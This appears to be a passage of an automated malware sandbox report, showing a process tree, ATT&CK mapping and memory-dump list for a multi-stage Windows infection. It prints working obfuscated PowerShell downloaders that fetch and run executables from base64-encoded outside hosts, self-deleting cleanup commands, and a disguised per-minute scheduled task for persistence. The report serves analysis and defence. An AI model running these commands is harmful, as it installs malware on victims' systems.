        PID:4884
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rmfigo.vbs"
        9⤵
        Checks whether UAC is enabled
        
        PID:4536
        
        C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"
        10⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of SetThreadContext
        Modifies registry class
        
        PID:2696
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dvdljtaccvivylcfphls.vbs"
        11⤵
        
        PID:5088
        
        C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"
        12⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of SetThreadContext
        
        PID:700
        
        C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
        
        C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
        13⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:4888
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /pid 4888 & erase C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe & RD /S /Q C:\\ProgramData\\558898630531236\\* & exit
        14⤵
        Checks whether UAC is enabled
        Maps connected drives based on registry
        
        PID:2644
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /pid 4888
        15⤵
        Kills process with taskkill
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
        
        C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Accesses Microsoft Outlook profiles
        Checks processor information in registry
        outlook_office_path
        outlook_win_path
        
        PID:3988
        
        C:\Users\Admin\AppData\Local\Temp\cc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cc.exe"
        12⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of SetThreadContext
        Modifies system certificate store
        
        PID:4552
        
        C:\Users\Admin\AppData\Local\Temp\cc.exe
        
        C:\Users\Admin\AppData\Local\Temp\cc.exe
        13⤵
        Executes dropped EXE
        
        PID:1164
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
        14⤵
        Creates scheduled task(s)
        
        PID:2228
        
        C:\Users\Admin\AppData\Local\Temp\pm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pm.exe"
        12⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        
        PID:1336
        
        C:\Users\Admin\AppData\Local\Temp\aspnet_compiler.exe
        
        C:\Users\Admin\AppData\Local\Temp\aspnet_compiler.exe
        13⤵
        Executes dropped EXE
        
        PID:4384
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"
        12⤵
        Checks whether UAC is enabled
        Maps connected drives based on registry
        
        PID:4748
        
        C:\Windows\SysWOW64\timeout.exe
        
        C:\Windows\system32\timeout.exe 3
        13⤵
        Delays execution with timeout.exe
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\mwh.exe
        
        C:\Users\Admin\AppData\Local\Temp\mwh.exe
        9⤵
        Executes dropped EXE
        
        PID:4964
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1D34.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        6⤵
        Checks whether UAC is enabled
        
        PID:2472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        7⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:3188
        
        C:\Users\Public\gev.exe
        
        "C:\Users\Public\gev.exe"
        8⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of SetThreadContext
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4900
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rmfigo.vbs"
        9⤵
        Checks whether UAC is enabled
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"
        10⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of SetThreadContext
        Modifies registry class
        
        PID:3104
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dvdljtaccvivylcfphls.vbs"
        11⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"
        12⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        Suspicious use of SetThreadContext
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
        
        C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
        13⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:4964
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /pid 4964 & erase C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe & RD /S /Q C:\\ProgramData\\899417348964903\\* & exit
        14⤵
        Checks whether UAC is enabled
        Maps connected drives based on registry
        
        PID:4160
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /pid 4964
        15⤵
        Kills process with taskkill
        
        PID:2328
        
        C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
        
        C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
        11⤵
        Executes dropped EXE
        
        PID:4312
        
        C:\Users\Admin\AppData\Local\Temp\gev.exe
        
        C:\Users\Admin\AppData\Local\Temp\gev.exe
        9⤵
        Executes dropped EXE
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\gev.exe
        
        C:\Users\Admin\AppData\Local\Temp\gev.exe
        9⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Maps connected drives based on registry
        
        PID:2132
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 1444
        10⤵
        Maps connected drives based on registry
        Program crash
        
        PID:4912
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        6⤵
        Delays execution with timeout.exe
        
        PID:1548
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1D34.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        6⤵
        Checks whether UAC is enabled
        
        PID:1556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        7⤵
        Blocklisted process makes network request
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:4136
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1D34.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        6⤵
        Checks whether UAC is enabled
        
        PID:4260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
        7⤵
        Maps connected drives based on registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:4368

C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
PID:3484
- C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Maps connected drives based on registry
  PID:1668
- - C:\Windows\SysWOW64\schtasks.exe
    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
    3⤵
    - Creates scheduled task(s)
    PID:1148

C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
PID:4424
- C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  2⤵
  - Executes dropped EXE
  PID:1676

C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
PID:4548
- C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  2⤵
  - Executes dropped EXE
  PID:4560

C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
1⤵
- Executes dropped EXE
PID:1264

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/428-272-0x0000000009370000-0x0000000009371000-memory.dmp

Filesize
4KB

Download
memory/428-206-0x00000000008D0000-0x00000000008D1000-memory.dmp

Filesize
4KB

Download
memory/428-221-0x0000000006BF0000-0x0000000006BF1000-memory.dmp

Filesize
4KB

Download
memory/428-224-0x0000000007360000-0x0000000007361000-memory.dmp

Filesize
4KB

Download
memory/428-274-0x0000000008B00000-0x0000000008B01000-memory.dmp

Filesize
4KB

Download
memory/428-283-0x0000000006603000-0x0000000006604000-memory.dmp

Filesize
4KB

Download
memory/428-252-0x00000000008D0000-0x00000000008D1000-memory.dmp

Filesize
4KB

Download
memory/428-209-0x0000000006CC0000-0x0000000006CC1000-memory.dmp

Filesize
4KB

Download
memory/428-208-0x0000000006650000-0x0000000006651000-memory.dmp

Filesize
4KB

Download
memory/428-226-0x0000000007600000-0x0000000007601000-memory.dmp

Filesize
4KB

Download
memory/428-241-0x0000000007E00000-0x0000000007E01000-memory.dmp

Filesize
4KB

Download
memory/428-235-0x0000000008010000-0x0000000008011000-memory.dmp

Filesize
4KB

Download
memory/428-207-0x00000000008D0000-0x00000000008D1000-memory.dmp

Filesize
4KB

Download
memory/428-223-0x00000000072F0000-0x00000000072F1000-memory.dmp

Filesize
4KB

Download
memory/428-220-0x0000000006600000-0x0000000006601000-memory.dmp

Filesize
4KB

Download
memory/428-222-0x0000000006602000-0x0000000006603000-memory.dmp

Filesize
4KB

Download
memory/428-232-0x0000000007A90000-0x0000000007A91000-memory.dmp

Filesize
4KB

Download
memory/832-217-0x0000000005690000-0x0000000005792000-memory.dmp

Filesize
1.0MB

Download
memory/920-334-0x0000000003AE0000-0x0000000003BE2000-memory.dmp

Filesize
1.0MB

Download
memory/964-366-0x0000000005F10000-0x0000000006012000-memory.dmp

Filesize
1.0MB

Download
memory/972-212-0x0000000005640000-0x0000000005742000-memory.dmp

Filesize
1.0MB

Download
memory/972-197-0x00000000006E0000-0x00000000006E1000-memory.dmp

Filesize
4KB

Download
memory/972-196-0x00000000001E0000-0x00000000001E3000-memory.dmp

Filesize
12KB

Download
memory/1276-148-0x0000000002140000-0x00000000021A6000-memory.dmp

Filesize
408KB

Download
memory/1276-140-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1276-152-0x0000000002140000-0x00000000021A6000-memory.dmp

Filesize
408KB

Download
memory/1276-153-0x0000000000470000-0x000000000047D000-memory.dmp

Filesize
52KB

Download
memory/1276-154-0x0000000002630000-0x0000000002631000-memory.dmp

Filesize
4KB

Download
memory/1276-155-0x0000000002660000-0x000000000266C000-memory.dmp

Filesize
48KB

Download
memory/1276-163-0x0000000002650000-0x0000000002651000-memory.dmp

Filesize
4KB

Download
memory/1276-147-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1276-146-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1308-187-0x00000000053F0000-0x00000000054F2000-memory.dmp

Filesize
1.0MB

Download
memory/1308-179-0x0000000002D90000-0x0000000002D91000-memory.dmp

Filesize
4KB

Download
memory/1392-213-0x0000000005F40000-0x0000000006042000-memory.dmp

Filesize
1.0MB

Download
memory/1408-423-0x0000000003030000-0x000000000317A000-memory.dmp

Filesize
1.3MB

Download
memory/1408-337-0x0000000003920000-0x0000000003A22000-memory.dmp

Filesize
1.0MB

Download
memory/1408-371-0x0000000003030000-0x000000000317A000-memory.dmp

Filesize
1.3MB

Download
memory/1808-185-0x00000000052D0000-0x00000000053D2000-memory.dmp

Filesize
1.0MB

Download
memory/1808-174-0x0000000000F40000-0x0000000000FEE000-memory.dmp

Filesize
696KB

Download
memory/1936-218-0x0000000005E80000-0x0000000005E81000-memory.dmp

Filesize
4KB

Download
memory/1936-215-0x0000000005A90000-0x0000000005B92000-memory.dmp

Filesize
1.0MB

Download
memory/2088-175-0x0000000007940000-0x0000000007941000-memory.dmp

Filesize
4KB

Download
memory/2088-150-0x0000000000830000-0x0000000000831000-memory.dmp

Filesize
4KB

Download
memory/2088-184-0x00000000078A0000-0x0000000007932000-memory.dmp

Filesize
584KB

Download
memory/2088-183-0x00000000078A0000-0x0000000007932000-memory.dmp

Filesize
584KB

Download
memory/2088-161-0x0000000007590000-0x0000000007591000-memory.dmp

Filesize
4KB

Download
memory/2088-172-0x0000000007595000-0x0000000007596000-memory.dmp

Filesize
4KB

Download
memory/2088-162-0x0000000007593000-0x0000000007595000-memory.dmp

Filesize
8KB

Download
memory/2088-182-0x0000000008820000-0x0000000008922000-memory.dmp

Filesize
1.0MB

Download
memory/2220-173-0x00000000031E0000-0x0000000003316000-memory.dmp

Filesize
1.2MB

Download
memory/2220-160-0x00000000031E0000-0x0000000003316000-memory.dmp

Filesize
1.2MB

Download
memory/2220-186-0x0000000004C30000-0x0000000004DBE000-memory.dmp

Filesize
1.6MB

Download
memory/2220-164-0x0000000000DA0000-0x00000000011DF000-memory.dmp

Filesize
4.2MB

Download
memory/2220-165-0x0000000000A10000-0x0000000000B12000-memory.dmp

Filesize
1.0MB

Download
memory/2220-167-0x00000000031E0000-0x0000000003316000-memory.dmp

Filesize
1.2MB

Download
memory/2220-166-0x00000000031E0000-0x0000000003316000-memory.dmp

Filesize
1.2MB

Download
memory/2376-219-0x0000000002820000-0x0000000002821000-memory.dmp

Filesize
4KB

Download
memory/2376-216-0x0000000002960000-0x0000000002A62000-memory.dmp

Filesize
1.0MB

Download
memory/2472-367-0x0000000006D20000-0x0000000006E22000-memory.dmp

Filesize
1.0MB

Download
memory/3188-228-0x0000000003530000-0x0000000003531000-memory.dmp

Filesize
4KB

Download
memory/3188-227-0x0000000003530000-0x0000000003531000-memory.dmp

Filesize
4KB

Download
memory/3188-237-0x0000000004DB0000-0x0000000004DB1000-memory.dmp

Filesize
4KB

Download
memory/3188-238-0x0000000004DB2000-0x0000000004DB3000-memory.dmp

Filesize
4KB

Download
memory/3188-284-0x0000000004DB3000-0x0000000004DB4000-memory.dmp

Filesize
4KB

Download
memory/3188-257-0x0000000003530000-0x0000000003531000-memory.dmp

Filesize
4KB

Download
memory/3560-180-0x0000000003270000-0x0000000003271000-memory.dmp

Filesize
4KB

Download
memory/3560-159-0x0000000073FF0000-0x0000000073FF1000-memory.dmp

Filesize
4KB

Download
memory/3560-144-0x00000000771A0000-0x00000000771A1000-memory.dmp

Filesize
4KB

Download
memory/3560-143-0x0000000000400000-0x000000000066B000-memory.dmp

Filesize
2.4MB

Download
memory/3560-181-0x0000000004840000-0x0000000004942000-memory.dmp

Filesize
1.0MB

Download
memory/3560-145-0x0000000002570000-0x0000000002571000-memory.dmp

Filesize
4KB

Download
memory/4136-246-0x0000000003190000-0x0000000003191000-memory.dmp

Filesize
4KB

Download
memory/4136-290-0x0000000003190000-0x0000000003191000-memory.dmp

Filesize
4KB

Download
memory/4136-370-0x0000000009830000-0x0000000009EA8000-memory.dmp

Filesize
6.5MB

Download
memory/4136-255-0x0000000006FF2000-0x0000000006FF3000-memory.dmp

Filesize
4KB

Download
memory/4136-253-0x0000000006FF0000-0x0000000006FF1000-memory.dmp

Filesize
4KB

Download
memory/4136-331-0x0000000006FF3000-0x0000000006FF4000-memory.dmp

Filesize
4KB

Download
memory/4136-247-0x0000000003190000-0x0000000003191000-memory.dmp

Filesize
4KB

Download
memory/4368-269-0x0000000006F32000-0x0000000006F33000-memory.dmp

Filesize
4KB

Download
memory/4368-259-0x0000000003140000-0x0000000003141000-memory.dmp

Filesize
4KB

Download
memory/4368-268-0x0000000006F30000-0x0000000006F31000-memory.dmp

Filesize
4KB

Download
memory/4368-374-0x00000000096F0000-0x0000000009D68000-memory.dmp

Filesize
6.5MB

Download
memory/4368-261-0x0000000003140000-0x0000000003141000-memory.dmp

Filesize
4KB

Download
memory/4368-368-0x0000000006F33000-0x0000000006F34000-memory.dmp

Filesize
4KB

Download
memory/4368-369-0x00000000095A0000-0x00000000096A2000-memory.dmp

Filesize
1.0MB

Download
memory/4696-373-0x0000000006B32000-0x0000000006B33000-memory.dmp

Filesize
4KB

Download
memory/4696-422-0x0000000006B33000-0x0000000006B34000-memory.dmp

Filesize
4KB

Download
memory/4696-372-0x0000000006B30000-0x0000000006B31000-memory.dmp

Filesize
4KB

Download
memory/4884-341-0x0000000005040000-0x0000000005041000-memory.dmp

Filesize
4KB

Download
memory/4900-342-0x0000000004E40000-0x0000000004E41000-memory.dmp

Filesize
4KB

Download